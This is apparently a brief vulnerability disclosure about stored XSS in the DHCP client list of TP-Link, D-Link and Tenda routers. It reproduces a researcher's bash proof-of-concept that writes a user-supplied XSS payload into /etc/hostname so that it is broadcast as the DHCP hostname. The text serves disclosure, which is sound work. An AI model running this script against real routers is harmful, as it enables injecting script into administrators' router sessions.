thousands of million of Routers manufactured by Tplink,dlink,Tenda are vulnerable to DHCP XSS on the main section for View connected DHCP Client List.
Attackers are able to spoof the name of their own DHCP host name into XSS payload to inject it on
a Router Client List .
the attack vector is loaded through viewing the client Connected DHCP , leading to execution of XSS payload with out secure parsing .
Lawrence Amer a researcher in Vulnerability Lab disclosed the exploit poc for reproducing the issue
included with Video to show the real impact .
Exploit POC :
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
echo $GREEN"[+] Vulnerability founded by : Lawrence Amer "
echo -n $BLUE"[~] type XSS Payload here :"
read -e xss
echo $xss > /etc/hostname
echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"